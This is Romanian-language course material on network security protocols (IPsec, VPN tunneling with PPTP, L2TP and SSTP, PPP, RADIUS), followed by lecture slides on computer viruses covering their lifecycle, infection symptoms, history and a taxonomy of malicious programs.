Încapsularea de tip tunel (IP tunneling) apare în momentul în care entitățile participante la
IPSec sunt de tip gateway; ele au în administrare una sau mai multe subrețele pentru traficul cărora
realizează operații criptografice. Pachetul încapsulat IPSec va avea un set de adrese IP exterioare -
adresele IP ale entităților gateway și un set de adrese IP interioare sau protejate - adresele IP,
publice sau private, ale subrețelelor din spatele acestor gateway-uri. Antetul extern specifică
perechea de entități între care se creează tunelul IP și se aplică măsurile de securitate pe baza IPsec.
Antetul intern precizează destinația finală a pachetului pentru realizarea rutării. ESP protejează
numai pachetul transmis prin tunelul IP, în timp ce AH asigură și securitatea antetului exterior
atașat. De regulă acest mod de operare se utilizează între porți de securitate care execută
împachetarea și despachetarea mesajelor (gateway-to-gateway).
Încapsularea de tip transport (transport mode) apare în momentul în care entitățile
participante la IPSec sunt calculatoare independente, care au instalat un soft specializat IPSec,
realizând operații criptografice pentru propriul trafic. Pachetul încapsulat va avea un singur set de

18
adrese IP, publice, ale acestor calculatoare. Protocolul de securitate intervine în pachetul IP și
adaugă un antet de securitate imediat după antetul IP (cu sau fără opțiuni exprimate) dar antetul IP
inițial (header-ul) nu se modifică, doar datele transmise sunt securizate (criptate și/sau
autentificate).
Prin folosirea protocolului AH, adresele IP ale sursei, respectiv destinației, nu pot fi
modificate pe parcurs deoarece acest lucru ar duce la modificarea valorii hash. ESP oferă protecție
minimă protocoalelor de nivel superior, în timp ce AH securizează total pachetul, inclusiv antetul
IP. Acest mod de operare se utilizează pentru schimbul de pachete între calculatoarele-gazdă (host-
to-host).
Dacă la unul din capetele canalului de comunicație definit de SA, se găsește un echipament
de securitate (security gateway, firewall), atunci este obligatoriu ca acel SA să lucreze în modul de
tunelare pentru a evita problemele create de existența căilor multiple de rutare precum și pe cele
datorate fragmentării pachetelor.
Configurarea echipamentelor dintr-o rețea în vederea aplicării IPsec se realizează de către o
persoană cu drepturi depline de stabilire a securității rețelei (security officer), în trei etape:
1. crearea grupurilor de securitate (SA) și stabilirea drepturilor și atribuțiilor acestora;
2. configurarea legăturilor dintre SA-uri și stabilirea ierarhiilor de priorități, folosind
ISAKMP/IKE (RFC 2408, RFC 2409);
3. stabilirea modalităților de clasificare a pachetelor IP și de acțiune asupra lor (permite sau
interzice accesul în rețea, aplică procedurile de securitate conform IPsec).
Aceste configurații referitoare la IPsec sunt stocate în bazele de date pentru securitatea
rețelei (SPD - Security Policy Database), la care are acces doar administratorul de rețea. Regulile de
securitate aplicate într-o rețea folosind IPsec stabilesc trei moduri posibile de acțiune asupra
pachetelor IP:
1. se aplică pachetului serviciile de securitate conform IPsec;
2. se interzice accesul pachetului în rețea (deny);
3. se acordă permisiunea de acces în rețea, fără aplicarea măsurilor de securitate IP (bypass
IPsec).
Modul de acțiune asupra unui pachet IP se stabilește pe baza antetelor conținute de acesta,
prin operația de clasificare a pachetelor, în funcție de diverși factori de selecție, cum ar fi: adresa IP
a sursei, adresa IP a destinației, portul-sursă, portul-destinație, protocolul de transport, numele
utilizatorului sau al sistemului, gradul de prioritate a informațiilor conținute în pachet.
IPsec oferă posibilitatea unei comunicări sigure în rețelele de arie largă (WAN), în aplicații
precum:

19
 definirea rețelelor virtuale private, în care uzual IPsec este configurat să folosească
protocolul ESP în modul tunel pentru furnizarea confidențialității; pentru o organizație cu
mai multe rețele locale, aflate în diferite locații, traficul intern al rețelelor locale nu este
securizat, în timp ce traficul între acestea utilizează IPsec pentru securizare; IPsec este
activat în echipamentele de acces la rețeaua de arie largă, de exemplu în gateway, router sau
firewall; operațiile de criptare/decriptare și de autentificare executate de IPsec sunt
transparente pentru stațiile de lucru și serverele din rețelele locale;
 accesul securizat de la distanță prin rețeaua publică de Internet la un sistem în care este
implementat protocolul IPsec; se poate apela la un furnizor de Internet pentru a obține
accesul securizat la o rețea privată;
 îmbunătățirea securității aplicațiilor distribuite care au o serie de mecanisme de securitate
incluse; principala caracteristică a IPsec care îi permite să securizeze o gamă atât de largă de
aplicații distribuite (e-mail, transfer de fișiere, acces Web etc.), este faptul că pentru întregul
trafic IP se pot utiliza mecanismele de criptare și/sau autentificare.
Pentru o SA ca și identificatori avem un număr aleatoriu, denumit identificator de securitate
(SPI - Security Parameter Index), o adresă IP de destinație și un protocol de securitate (AH sau
ESP).
Identificatorul de securitate constă într-un sir de biți cu semnificație locală, inclus în
antetele AH și ESP pentru a permite destinației să selecteze SA-ul pentru procesarea pachetului
recepționat.
Adresa IP de destinație este adresa nodului de destinație al SA, care poate fi un calculator-
gazdă (host) sau un echipament de comunicație al rețelei (router, firewall, access point).
Identificatorul protocolului de securitate indică pentru care protocol, AH sau ESP, lucrează
SA. Dacă este necesară utilizarea ambelor protocoale de securitate în Internet (AH si ESP), atunci
se creează și se configurează legăturile dintre două sau mai multe SA.
Pentru ca în momentul securizării traficului fiecare entitate să cunoască parametrii de
securizare pentru fiecare tip de trafic este folosit identificatorul SPI - Security Parameter Index, un
index pe baza de date SAD. Folosind acest index și valoarea adresei IP din destinația pachetului ce
urmează a fi supus procesului de criptare sau autentificare, fiecare entitate IPSec știe exact ce
transformare trebuie realizată pe fiecare pachet IP pentru ca acesta să poată fi corect decriptat și
interpretat la receptor.
În momentul recepției unui pachet astfel securizat procesul de decriptare este asemănător cu
cel realizat la criptare. În cazul în care sunt mai mult de doi participanți la SA, în cazul traficului de
tip multicast, asocierea de securitate este furnizată pentru întregul grup și este prezentă pe fiecare

20
sistem participant. Pot exista, de asemenea, mai multe asocieri de securitate pentru un același grup
de entități, fiecare cu diverse nivele de securitate în interiorul grupului.
În funcție de al tipului entității participante la IPSec putem avea modelul de trafic:
 LAN-to-LAN sau site-to-site, în cazul în care entitățile sunt două gateway-uri de securitate
care realizează operații criptografice pentru subrețele protejate aflate în administrarea lor;
 Remote-Access sau Dial-Up VPN, în cazul în care entitățile sunt un gateway de securitate
care are în administrare o subrețea și un calculator independent care dorește să comunice cu
acea subrețea.
Această manieră de clasificare se pretează în exclusivitate tipului de încapsulare tunel,
neavând sens pentru tipul transport, în principal datorită faptului că un pachet trimis pe rețea are
două seturi de adrese IP: un set „extern”, reprezentat de adresele IP are calculatorului și al gateway-
ului căruia se adresează, și un set de adrese IP „intern”, reprezentat de adresa IP a unei mașini din
interiorul rețelei și a unei adrese IP noi a calculatorului, obținută de la acel gateway pentru a avea
adresabilitate de nivel IP în interiorul rețelei la care acest calculator se conectează. Procedeul prin
care un calculator obține, în momentul negocierii IPSec o adresă de la gateway pentru a avea acces
într-o rețea internă este numit mode-config în scenariile de tip IKEv1 sau configurare remote în cele
de IKEv2.
În momentul negocierii de IKE a parametrilor asocierii de securitate se realizează și faza de
autentificare mutuală sau unilaterală a entităților, existând mai multe modalități de a realiza această
autentificare:
 PSK - Pre-Shared Key: pentru autentificare, fiecare entitate are pre-configurată o cheie
secretă, o parolă; în momentul realizării negocierii IKE, entitățile trimit această cheie pe
rețea, spre a fi verificată de entitățile omoloage și verifică, la rândul lor, că o anumită
entitate-pereche are o anumită cheie secretă;
 PKI - Public Key Infrastructure: pentru autentificare este folosit un sistem de tip PKI;
fiecare entitate are un certificat digital semnat de o autoritate de certificare publică sau
internă a companiei, dar de încredere pentru toate entitățile participante în IPSec; în faza de
autentificare din IKE, fiecare entitate își trimite certificatul digital către omologi spre a fi
verificat și verifică la rândul ei validitatea acelui certificat digital;
 EAP - Extensible Authentication Protocol: la rândul său un framework, de data aceasta de
autentificare, EAP nu realizează însuși autentificarea, ci oferă o schemă de mesaje de
autentificare ce folosește metode specifice, cum sunt MD5, GTC, TLS, SIM, AKA; în faza
de autentificare, EAP este folosit ca extensie a protocolului IKEv2, acest framework nefiind
suportat în IKEv1.

21
Cele mai multe implementări de IPSec încearcă să realizeze pe cât posibil optimizarea
utilizării resurselor computaționale disponibile. Un exemplu în acest sens este închiderea tunelului
IPSec în cazul în care nu se mai trimit date pentru o anumită durată de timp, sau dacă lărgimea de
bandă ocupată pentru o anumită conexiune este nulă. Dacă aceasta este configurația implicită,
pentru anumite conexiuni se poate dori suprascrierea ei și menținerea acelei conexiuni. Una dintre
posibilitățile puse la dispoziție de standard se numește DPD - Dead Peer Detection. Acesta este un
mecanism de timp keepalive care presupune trimiterea unui pachet între capetele conexiunii, la un
interval stabilit.
Cu toate „măsurile de siguranță” luate în cazul IPSec, au fost raportate și unele
vulnerabilităţi în anumite configuraţii ale acestuia, acestea putând fi exploatate de atacatori pentru a
sustrage informaţii confidenţiale. Aceste atacuri sunt posibile când IPSec foloseşte ESP în modul de
funcţionare tunnel cu opţiunea confidentiality only, sau opţiunea integrity protection oferită de
modulul AH sau de un protocol de nivel mai ridicat. Dacă un atacator poate intercepta şi modifica
comunicaţiile IPSec și ICMP între două servere de tip security gateway, exploatând această
vulnerabilitate poate lansa atacuri de tip Destination Address Rewriting, IP Options modification şi
Protocol Field modification, astfel făcând posibilă sustragerea de informaţii din datele transferate
folosind IPsec. Ca și soluţie este recomandat să se configureze ESP astfel încât să folosească atât
opţiunea confidentiality, cât şi integrity protection și să se folosească protocolul AH alături de ESP
pentru a oferi protecţia integrităţii.

12.3.2. VPN
Noțiunea de rețea virtuală privată a fost dată în compartimentul precedent. În continuare
vom face cunoștință cu protocoalele, în baza cărora funcționează un VPN.
VPN-urile nu pot face conexiunile online complet anonime, dar de obicei pot spori nivelul
de confidențialitate și securitate. Pentru a împiedica scurgerea informațiilor private, rețelele VPN
permit în mod obișnuit doar acces autentificat la distanță, utilizând protocoale de tunelizare și
tehnici de criptare.
Modelul de securitate VPN oferă:
 confidențialitate, astfel încât, chiar dacă traficul de rețea este „ascultat” la nivelul
pachetelor, un atacator ar vedea numai date criptate;
 autentificarea expeditorului, pentru a împiedica accesul utilizatorilor neautorizați la VPN;
 integritatea mesajelor, pentru a detecta eventualele cazuri de manipulare a mesajelor
transmise.

22
Un tunel permite încapsularea unui pachet dintr-un tip de protocol în cadrul datagramei1
unui alt protocol. De exemplu, VPN utilizează PPTP pentru a încapsula pachetele IP printr-o rețea
publică, cum ar fi Internetul.
O soluție VPN poate fi configura în baza protocoalelor:
 Point-to-Point Tunneling Protocol (PPTP),
 Layer 2 Tunneling Protocol (L2TP),
 Secure Socket Tunneling Protocol (SSTP).
PPTP, L2TP și SSTP depind în mare măsură de caracteristicile specificate inițial pentru
protocolul Point-to-Point Protocol (PPP), care a fost proiectat pentru a trimite date prin conexiunea
dial-up sau conexiunea dedicată point-to-point. Pentru IP, PPP încapsulează pachetele IP în cadrul
frame-urilor PPP și apoi transmite pachetele PPP încapsulate prin intermediul unei legături point-to-
point. PPP a fost definit inițial ca protocolul care va fi utilizat între un client dial-up și un server de
acces la rețea.
Protocolul PPTP permite ca traficul multiprotocol să fie criptat și apoi încapsulat într-un
antet IP care să fie trimis într-o rețea IP sau într-o rețea IP publică, cum ar fi Internetul. PPTP poate
fi utilizat pentru conexiuni la distanță și conexiuni VPN site-to-site. Atunci când utilizează
Internetul ca rețea publică pentru VPN, serverul PPTP este un server VPN ce suportă PPTP cu o
interfață pe Internet și o a doua interfață pe intranet.
PPTP încapsulează frame-uri PPP în datagrame IP pentru transmisie pe rețea. PPTP
utilizează o conexiune TCP pentru gestionarea tunelurilor și o versiune modificată a Generic
Routing Encapsulation (GRE) pentru a încapsula frame-uri PPP pentru datele tunelate. Conținutul
relevant (payload) al frame-urilor PPP încapsulate poate fi criptat, comprimat sau și una și alta.
Structura unui pachet PPTP care conține o datagramă IP este prezentată în figura 12.4.

Figura 12.4. Structura unui pachet PPTP care conține o datagramă IP

Frame-ul PPP este criptat cu Microsoft Point-to-Point Encryption (MPPE) utilizând chei de
criptare generate de procesul de autentificare MS-CHAP v2 sau EAP-TLS. Clienții de creare a rețelei
virtuale private trebuie să utilizeze protocolul de autentificare MS-CHAP v2 sau EAP-TLS, pentru

1
Datagrama este un bloc de informații transmis de un protocol, fără a stabili mai întâi o conexiune și a crea un canal
virtual. Orice protocol care nu stabilește o pre-conexiune (și, de obicei, nu controlează ordinea de recepție, transmitere
și dublare a pachetelor) se numește datagram protocol. Așa sunt, de exemplu, protocoalele Ethernet, IP, UDP etc.
Numele „datagrama” a fost ales prin analogie cu cuvântul telegrama.
23
a putea cripta conținutul relevant al frame-urilor PPP. PPTP utilizează criptarea realizată de PPP și
doar încapsulează frame-ul PPP criptat anterior.
Protocolul L2TP permite ca traficul multiprotocol să fie criptat și apoi trimis prin orice mod
care suportă livrarea point-to-point a datagramei, cum ar fi protocolul IP sau modul de transfer
asincron (ATM2). L2TP este o combinație între PPTP și L2F3, o tehnologie dezvoltată de Cisco
Systems, Inc. L2TP reprezintă cele mai bune caracteristici ale PPTP și L2F.
Spre deosebire de PPTP, implementarea de către Microsoft a L2TP nu utilizează MPPE
pentru a cripta datagramele PPP. L2TP se bazează pe securitatea IPsec în modul Transport pentru
serviciile de criptare. Combinația dintre L2TP și IPsec este cunoscută sub numele de L2TP/IPsec.
Atât L2TP cât și IPsec trebuie să fie suportate atât de clientul VPN, cât și de serverul VPN.
L2TP este instalat cu protocolul TCP/IP.
Încapsularea pentru pachetele L2TP/IPsec constă din două nivele: încapsularea L2TP și
încapsularea IPSsec.
La încapsularea L2TP, un frame PPP (o datagramă IP) este înfășurat cu un antet L2TP și un
antet UDP (figura 12.5).

Figura 12.5. Structura unui pachet L2TP care conține o datagramă IP

La încapsularea IPsec mesajul L2TP obținut este apoi înfășurat cu IPsec Encapsulating
Security Payload (ESP) header și trailer, un IPsec Authentication trailer care asigură integritatea și
autentificarea mesajelor și un header IP final. În header-ul IP sunt adresele IP sursă și destinație
care corespund clientului VPN și serverului VPN (figura 12.6).
Criptarea. Mesajul L2TP este criptat, utilizând chei de criptare generate de procesul de
negociere Internet Key Exchange (IKE).

2
Mod de transfer asincron (ATM - Asynchronous Transfer Mode) este un protocol de comutație temporală asincronă,
de mare viteză, orientată pe conexiune și bazată pe circuite virtuale, folosită în transportul traficului de rețea. ATM
împachetează informațiile în celule de lungime fixă a câte 53 de octeți, care pot fi interschimbate rapid de conexiunile
logice dintr-o rețea informatică.
3
L2F sau Layer 2 Forwarding este un protocol de tunel dezvoltat de Cisco Systems, Inc. pentru a stabili conexiuni de
rețea privată virtuală prin Internet. L2F nu oferă de la sine criptarea sau confidențialitatea și se bazează pe protocolul de
tunel care asigură confidențialitatea. L2F a fost proiectat anume pentru a realiza tuneluri de tip PPP.
24
Figura 12.6. Încapsularea L2TP și IPsec pentru o datagramă PPP

Protocolul SSTP este un protocol de tunelare care utilizează protocolul HTTPS prin portul
TCP 443 pentru a trece traficul prin firewall-uri și proxy-uri web care ar putea bloca traficul PPTP
și L2TP/IPsec. SSTP oferă un mecanism de încapsulare a traficului PPP pe canalul TLS al
protocolului HTTPS. Utilizarea PPP oferă suport pentru metode puternice de autentificare, cum ar fi
EAP-TLS. SSL asigură securitatea la nivelul Transport prin negocierea cheii, criptare și verificarea
integrității.
Atunci când un client încearcă să stabilească o conexiune VPN bazată pe SSTP, protocolul
stabilește mai întâi un nivel HTTPS bidirecțional cu serverul SSTP. Prin intermediul acestui nivel
HTTPS, pachetele de protocoale se transmit ca payload.
Încapsularea. SSTP încapsulează frame-uri PPP în datagrame IP pentru a fi transmisie prin
rețea. SSTP utilizează o conexiune TCP (prin portul 443) pentru gestionarea tunelurilor, precum și a
frame-urilor de date PPP.
Criptarea. Mesajul SSTP este criptat cu canalul TLS al protocolului HTTPS.
Pe scurt, mecanismul de funcționare al protocolului SSTP este următorul (figura 12.7):
1. este stabilită conexiunea TCP de la client la server (implicit pe portul 443);
2. SSL validează certificatul serverului; dacă certificatul este valid, conexiunea este
stabilită, altfel conexiunea este întreruptă;
3. clientul trimite pachete de control SSTP prin sesiunea HTTPS, care stabilește starea
SSTP pe ambele părți;
4. negocierea PPP asupra SSTP; clientul se autentifică pe server și leagă adresele IP de
interfața SSTP;
5. tunelul SSTP este acum stabilit și încapsularea pachetelor poate începe.

25
Figura 12.7. Mecanismul de funcționare al protocolului SSTP

Protocoalele PPTP, L2TP și SSTP stau la baza VPN realizate în IPsec, Datagram Transport
Layer Security (DTLS), utilizat în Cisco AnyConnect VPN și în OpenConnect VPN, Microsoft
Point-to-Point Encryption (MPPE), Microsoft Secure Socket Tunneling Protocol (SSTP), Multi
Path Virtual Private Network (MPVPN, Secure Shell (SSH) VPN și altele.

12.4. Protocoale la Nivelul Legătură de Date


La nivelul Data Link Layer de asemenea sunt câteva protocoale, printre care: PPP, RADIUS
și TACAS+.

12.4.1. Protocolul PPP


Point-to-Point Protocol (PPP) este un protocol de comunicație folosit pentru a stabili o
conexiune directă între două noduri. El conectează direct două routere fără nici un host sau alt
dispozitiv de rețea între ele. PPP poate asigura autentificarea conectării, criptarea transmisiei
(folosind ECP, RFC 1968) și compresia.
Protocolul Point-to-Point constă din trei componente principale:
 o metodă de încapsulare a datagramelor prin serial link;
 protocolul LCP (Link Control Protocol) pentru stabilirea, configurarea și testarea
conexiunii legăturii de date;
 o familie de protocoale de control al rețelei NCP (Network Control Protocols) pentru
stabilirea și configurarea diferitor protocoale de nivel de rețea.

12.4.2. RADIUS
Remote Authentication Dial In User Service (RADIUS) este un protocol standard de
Internet care furnizează autentificare centralizată, contabilizare şi servicii de gestiune a IP-urilor
pentru utilizatorii de acces la distanţă într-o reţea dial-up distribuită (deseori se utilizează acronimul
AAA - Authentication, Authorization, Accounting – pentru aceste trei servicii).
Modelul client-server RADIUS are un NAS (Network Access Server - Server de acces la
reţea) care operează drept client al unui server RADIUS. Sistemul, acţionând ca NAS-ul, trimite

26
informaţiile de conexiune şi utilizator la un server RADIUS desemnat utilizând protocolul standard
RADIUS definit în RFC 2865 (figura 12.8).

Figura 12.8. Autentificarea și autorizarea printr-un server RADIUS

Serverele RADIUS acţionează la cererile de conexiune ale utilizator autentificând


utilizatorul şi apoi returnează toate informaţiile de configurare necesare la NAS, astfel încât NAS
(sistemul) să poată livra servicii autorizate la utilizatorul de apel de intrare autentificat. Dacă nu se
poate ajunge la un server RADIUS, sistemul poate ruta cererile de autentificare la un server
alternativ. Aceasta permite întreprinderilor globale să le ofere utilizatorilor lor un serviciu de apel
de intrare cu un ID unic de logare a utilizatorului pentru acces la nivelul corporaţiei, indiferent de
punctul de acces care este utilizat.
Când se primeşte o cerere de autentificare de către serverul RADIUS, cererea este validată;
apoi serverul RADIUS decriptează pachetul de date pentru a accesa informaţiile de parolă şi nume
de utilizator. Informaţiile sunt transmise la sistemul de securitate corespunzător. Acestea pot fi
fişierele de parolă UNIX, Kerberos, un sistem de securitate comercial sau chiar un sistem de
securitate dezvoltat de client. Serverul RADIUS trimite înapoi la sistem toate serviciile pe care
utilizatorul autentificat este autorizat să le utilizeze, cum ar fi o adresă IP. Cererile de contabilizare
RADIUS sunt tratate de o manieră similară (figura 12.9). Informaţiile de contorizare ale
utilizatorului la distanţă pot fi trimise unui server de contorizare RADIUS desemnat. Protocolul
standard de contabilizare RADIUS este definit în RFC 2866. Serverul de contorizare RADIUS
acţionează asupra cererilor de contorizare prin înregistrarea informaţiilor din cererea de contorizare
RADIUS.

27
Figura 12.9. Contabilizarea printr-un server RADIUS

Din protocolul RADIUS a fost derivat protocolul DIAMETER, el având multe îmbunătățiri
în diverse aspecte și este, în general, considerat a fi protocolul de autentificare, autorizare și
contabilizare (AAA) de următoarea generație, el fiind un protocol la nivelul aplicație.

12.5. Întrebări și subiecte pentru aprofundarea cunoștințelor și lucrul individual


1. Explicați la general principiul de funcționare al protocolului PGP?
2. Care sunt avantajele aplicării protocolului https în mediul WWW? Descrieți schema
generală de funcționare a acestui protocol.
3. Descrieți cum se realizează comunicarea dintre client și server cu ajutorul
protocolului SSL/TLS. Justificați necesitatea de înlocuire a protocolului SSL cu
TLS.
4. Descrieți serviciile de securitate pe nivelul IP al rețelelor TCP/IP realizate de
protocolul IPSec.
5. Cum se realizează autentificarea prin intermediul IPSec?
6. Descrieți, în baza unui protocol criptografic, principul de funcționare a unei rețele
virtuale private.

28
Tema
Virușii calculatoarelor

1. Virușii informatici – prezentare


generală
2. Istoria virușilor
3. Tipuri de viruși
1. Virușii informatici – prezentare
generală

Programele daunatoare pot fi instalate chiar si


manual pe o singur calculator. Ele de asemenea
pot fi construite in variate pachete comerciale
de soft. Ele sunt foarte greu de detectat inainte
de activitatile de payload (activitati pe care
trebuie sa le faca un program daunator).
1. Virușii informatici – prezentare
generală
• Un virus informatic (de computer) clasic este un program proiectat să se
autoreplice şi să se răspîndească prin reţele, memorii infectînd cât mai
multe computere, fără ca utilizatorii să-şi dea seama de acest lucru.
• Viruşii se răspîndesc ataşându-se de alte programe, fişiere executabile,
documente, sau unii pot să infecteze sectorul de boot al discului.
• Când se lansează în execuţie un fişier infectat, se lansează şi virusul în
execuţie.
• Adesea, virusul rămâne rezident în memoria computerului, pentru a putea
infecta următorul program lansat în execuţie, sau următoarea memorie
accesată.
• Ceea ce fac viruşii periculoşi este abilitatea lor de a executa acţiuni în
calculator. În timp ce unele din aceste acţiuni sunt neplăcute (cum ar fi
afişarea unui mesaj la o anumită dată sau ca răspuns la o anumită acţiune
a utilizatorului, iar altele enervante (cum ar fi reducerea performanţelor
calculatorului), există viruşi care pot provoca adevărate catastrofe,
distrugând fisiere de date, documente, sau fãcând calculatorul inutilizabil.
Ciclul de viață al virușilor
calculatoarelor
• Crearea – programul de tip virus este creat;
• Replicarea – virusul este copiat de pe un PC pe altul;
• Activarea – virusul declanșează acțiunea pentru care a
fost creat și generează efectele distructive;
• Descoperirea – vir. este detectat și descris pein
documentație specială;
• Asimilarea – companiile care realizează soft antivirus
își modifică programele lor prin includerea pe lista
virușilor de îndepărtat și a acestui virus;
• Eradicarea – se folosește softul antivirus pentru a
elimina efectele virusului.
Fazele Virusilor

• Dormant phase: virusul este “idle”.


• Propagation phase: virusul plaseaza o copie a sa in alte
programe.
• Triggering phase: virusul este activat sa faca functia pentru
care el a fost creat.
• Execution phase: functia este efectuata.
Simptomele unui sistem virusat
• fişierele sistem cresc în lungime;
• blocări frecvente - majoritatea viruşilor sunt extrem de prost scrişi si blochează
calculatorul extrem de des;
• mesaje ciudate, melodii sau sunete suspecte în difuzor. Mulţi viruţi îşi fac
anunţatã prezenţa prin astfel de efecte;
• distrugerile de date sunt alt efect al viruşilor. Dispariţia subită a unui fişier sau
erori ale sistemului de fişiere sunt clasice;
• încetinirea accesului la disc este produs de unii viruşi stealth care se interpun
între programe şi sistemul de acces la discuri;
• la apăsarea tastelor CTRL+ALT+DEL calculatorul boot-ează instantaneu fără a mai
trece prin ecranul de POST (power on, self test);
• nu mai porneşte Windows sau se raportează că accesul la disc se face prin BIOS;
• schimbări ale marcajului de timp al fişierelor;
• încărcarea mai grea a programelor;
• operarea înceată a calculatorului;
• sectoare defecte pe dischete etc.
Simptomele de infectare cu Virusi

– Programele se incarca mai greu decit de obicei.


– Hard-diskul este accesat fara vreo explicatie logica.
– Mareste utilizarea spatiului de disk.
– Aparitia de caractere stranii in listele de directorii si fisiere.
– Aparitia de mesaje stranii ca “Happy birthday”, “Driver
memory error”.
– Programele se pot bloca sau sa nu functioneze.
2. Istoria virușilor

• Istoria virusilor de calculatorare este lunga si interesanta


care s-a dezvoltat foarte impunator odata cu dezvoltarea
industriei PC.
• In anul 1986, niste programatori de la Basic&Amjad au
descoperit ca un anumit sector dintr-un floppy disk
contine un cod executabil care functiona de cite ori
porneau computerul cu discheta montata in unitate.
Acestora le-a venit ideea înlocuirii acestui cod executabil
cu un program propriu. Acest program putea beneficia de
memorie si putea fi astfel copiat în orice dischetã si lansat
de pe orice calculator de tip PC. Ei au numit acest
program virus, ocupând doar 360 KB dintr-un floppy disc.
2. Istoria virușilor

• In acelasi an programatorul Ralf Burger a descoperit ca un


fisier poate fi facut sa se autocopieze, atasind o copie
intr-un alt director.
• La scurt timp au inceput sa apara numerosi virusi care au
evoluat rapid luind diverse forme si inglobind idei din ce
in ce mai sofisticate.
• In 1990 erau cunoscuti 300 virusi
• In 1995 s-au inregistrat 7000 virusi.
• In 1995 a aparut conceptul de macrovirus. Acestia nu
erau adresati numai anumitor platforme specifice, astfel
ca ei puteau sa fie folositi pentru orice program,
usurindu-se calea de aparitie a cunoscutilor microvirusi.
2. Istoria virușilor
• Primele programe virusulente, le-am putea numi chiar
primitive, măreau dimensiunea fişierelor şi reduceau viteza
de răspuns, afectând performanţele computerului.
• Mulţi viruşi cautau doar să se răspândească, nu să afecteze
computerul, astfel încât nu produceau daune în mod
intenţionat.
• Există posibilitatea ca viruşii să interacţioneze întâmplător
cu alte programe sau chiar cu hardware-ul şi să
încetinească sau să oprească sistemul operaţional.
• Viruşii de ultimile generaţii, sunt mult mai periculoşi,
aceştia pot modifica sau distruge datele, sau pot şterge
fişierele şi pot reformata hard-discul, efectuiază transferuri
băneşti, spionează etc.
2. Istoria virușilor
1949 John von Neumann a pus pentru prima oara bazele teoriilor legate de programele care se autoreproduc.
1950 Bell Labs au lansat Core Wars – lupta dintre două programe, ambele încercînd să preia controlul calc.
1970 Gregory Benford a folosit termenul virus pentru a face referire la codurile autoreplicabile din sistemele Arpanet
1981
Virusii Apple 1, 2, si 3 sunt printre primii virusi in libertate "in the wild". Descoperit in SO Apple II, virusul a fost transmis
cu numele Elk Cloner, dar nu a avut efect distructiv, ci afișa poezia:
Îti ca ocupa toate discurile, Procesoarelor le va închide pliscurile, Da, îsta-i Cloner!,
Se va lipi de tine scai, Și-ți va face RAM-ul putregai, Semnează Cloner
1983(85)
In teza sa de doctorat Computer Viruses, Fred Cohen defineste pentru prima oara formal un virus de calculator ca fiind
"un program ce poate afecta alte programe de calculator, modificandu-le intr-un mod care presupune abordarea unor
copii evoluate ale lor.“
1986
Doi programatori, Basit si Amjad, inlocuiesc codul executabil din sectorul boot al unui floppy-disk cu propriul lor cod, care
infecta fiecare floppy de 360 Kb accesat pe orice drive. Floppy-urile infectate aveau "© Brain" ca eticheta de disc (volume
label).
1988
Scapa din lesa unul dintre cei mai cunoscuti virusi: Jerusalem. Activat in fiecare vineri 13, virusul afecteaza fisierele .exe si
.com si sterge toate programele rulate in cursul acelei zile.
1990
Symantec lanseaza pe piata Norton AntiVirus, unul dintre primele programe antivirus dezvoltate de catre una dintre
marile companii.
1991
Tequila este primul virus polimorf cu raspandire pe scara larga gasit "in the wild". Virusii polimorfi fac ca detectarea lor de
catre scanerele de virusi sa fie dificila, prin schimbarea modul de actiune cu fiecare noua infectie.
2. Istoria virușilor
1992 Apogeul Virusologiei - exista 1300 de virusi, cu aproape 420% mai multi decat in decembrie 1990. Previziunile sumbre ale
virusului Michelangelo ameninta harddiskurile a circa 5 milioane de calculatoare pe data de 6 martie. In realitate, au fost mai putine…
1994
Farsa de proportii din partea email-ului hoax (alarma falsa)Good Times. Farsa se bazeaza pe amenintarea unui virus sofisticat care e
capabil sa stearga un intreg hard prin simpla deschidere a emailului al carui subiect este "Good Times". Desi se stie despre ce e vorba,
hoaxul revine la un interval de 6-12 luni.
1995
Word Concept, virus de Microsoft Word, devine unul dintre cei mai raspanditi virusi din anii '90.
1998
StrangeBrew, actualmente inofensiv si totusi raportat, este primul virus care infecteaza fisierele Java. Virusul modifica fisierele CLASS
adaugand la mijlocul acestora o copie a sa si incepand executarea programului din interiorul sectiunii virusate.
Virusul Cernobal se raspandeste rapid prin intermediul fisierelor ".exe". Dupa cum o sugereaza si notorietatea numelui sau, virusul este
nemilos, atacand nu numai fisierele dar si un anumit cip din interiorul computerelor infectate.
1999
Virusul Melissa executa un macro dintr-un document atasat emailului, care transmite mai departe documentul la 50 de adrese
existente in Outlook address book. Virusul infecteaza si documente Word pe care le trimite ca atasamente.
Melissa -1 milion de calculatoare.
Bubble Boy este primul virus care nu mai depinde de deschiderea atasamentului pentru a se executa. De indata ce userul deschide
email-ul, Bubble Boy se si pune pe treaba.
2000
Love Bug, cunoscut si sub numele de ILOVEYOU se raspandeste via Outlook, asemanator modului de raspandire al Melissei. Acest virus
e primit ca un atasament .
2001 – vedetele anului au fost Nimda, CodeRed, Aliz / au fost adevarati pioneri în stabilirea viitoarelor tendinte de securitate. Canalele
ICQ si MS Messenger au fost pentru prima dată folosite ca căi de transmitere a virușilor. Virușii pentru Linux. Primul virus RedHat Linux
a intrat fraudulos in retelele NASA… Au apărut viermii – invizibili care infectat fara a folosi fisiere, existau numai in RAM și se
răspîndeau ca pachete de date special configurate.
2004 Primii viruși destinați telefoanelor mobile: Cabir, Mosquitos…
2005 s-a dezvoltat phishing-ul, troieni spioni…Virușii și viermii au devenit mai moderniSober.P – mesage legate de deschiderea caselor
de bilete la Campionatul Mondial de fotbal, infectind calc. din 40 de țări.
Taxonomia programelor daunatoare.
Definitii
• Trapdoor: puncte de intrare alternative scrise in coduri
de depanare care pot permite utilizatorilor nedoriti
accesul catre sistem.
• Logic Boombs: un cod daunator care se activeaza la un
anumit timp (ex: data, ora…)
• Trojan Horse: instructiuni dintr-un program care
cauzeaza lucruri rele ca sa se intimple(ex: trimiterea de
date sau parole la o alta persoana prin internet.)
• Virusi: cod care se copie in alte programe.
• Bacteria: un program care se reproduce pina umple
spatiul de disk, sau pina incarca CPU.
• Worm: program care se copie pe sine in retea.(de obicei
atasate de mesajele de pe email sau documentelor
atasate.)
Ce este un virus de calculator?

• Un virus de calculator este un program de dimensiuni


mici, construit cu scopul de a face o gluma sau de a
sabota pe cineva. Acest program are proprietatea ca se
autoreproduce, atasindu-se altor programe si executind
operatii nedorite sau de distrugere.
• Virusul este caracterizat de urmatoarele proprietati:
– Poate modifica fisiere si programe ale utilizatorilor, prin inserarea
in acestea a intregului cod sau numai a unei parti speciale din
codul sau.
– Modificarile pot fi provocate nu numai programelor ci si unor
grupuri de programe
– Are nevoie si poate sa recunoasca daca un program a fost deja
infectat pentru a interzice o noua modificare.
Structura virusilor

